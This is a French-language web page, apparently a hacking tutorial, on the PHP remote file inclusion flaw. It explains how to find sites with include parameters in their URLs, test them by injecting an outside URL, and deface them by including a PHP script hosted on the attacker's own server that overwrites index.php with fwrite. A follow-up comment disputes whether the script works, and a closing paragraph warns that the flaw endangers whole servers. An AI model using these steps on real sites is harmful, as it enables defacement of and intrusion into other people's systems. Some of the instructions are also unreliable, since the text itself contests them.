Chargement de la page en cours... 


faille include

Nouveauté!


  • faille include
Voici la faille décrite en détails :
Vous savez tous que l'avantage du PHP sur l'HTML est que le PHP est
dynamique, ça veut dire que vous pouvez changer le contenu des pages
visionnées. L'URL si dessus charge une page index.php dite "normale"
puis y inclut le code de la variable $page, suivit de l'extension PHP
bien évidemment. Dans notre exemple la page qui sera visible sera
donc la page Team.php.
En conclusion
http://www.site.com/index.php?page=Team revient à
indiquer l'URL
http://www.site.com/Team.php
La faille d'!include! est une faille courante présente sur un grand
nombre de sites. Elle est de plus trés simple à exploiter.
--> la localiser : Il faut trouver un site avec des url du type :
www.lesite.fr/index.php?url=page.php
http://www.site.fr/index.php?var=admin.php
Pour vérifier si la faille est présente , on va donc essayer "d'inclure"
notre URL :
http://www.lesite.fr/index.php?url=http://www.google.fr ou http:
//www.site.fr/index.php?var=http://www.google.fr
Là si l'index apparait dans le site , c'est que le site n'est apparament
pas protégé
Pour defacer le site
On va donc pouvoir essayer d'ajouter du code en utilisant la fonction
fwrite() ce qui aura pour effet de déffacer l'index du site !
Il suffit de faire ce petit scipt php et de le stoker sur un compte :
$fp=fopen("index.php", w);
$msg="le message de ton defacage ";
fwrite($fp,$msg);
fclose($fp);
?>
Voila, maintenant il suffit de faire comme on a vu plus haut ,
admettons que ta page du script se nomme deface :
www.lesite.fr/page.php?url=http://[mon site]/deface.php
Voila , c'est pas plus compliqué que ça.
___________________________________
mais je pense que ce tuto est faux car si vous faite cela,
:
$fp=fopen("index.php", w);
cela écrit sur VOTRE page index.php :(
j'appelle cela :
Se hacker soit même ! !!!!!!!!!!!!!
Voila.
il faudrait taper :
$fp=fopen("http://[lesitecible]index.php", w);
mais cela ne marche pas.
Avec une modification en local de son phpinfo(), la fonction !include!
permet peut etre l'inclusion de fichier distant ?

faille include... que l’on trouve communément dans les développements
php. Cette faille semble avoir été largement documentée sur ces dernières
années mais l’explication s’arrête toujours et irrémédiablement à la
modification de l’index de votre site Internet. Ce qui est éludé dans ces
documents, c’est à quel point cette faille peut mettre en péril la totalité de
votre serveur, de votre réseau et donc de tout ce qui endécoule.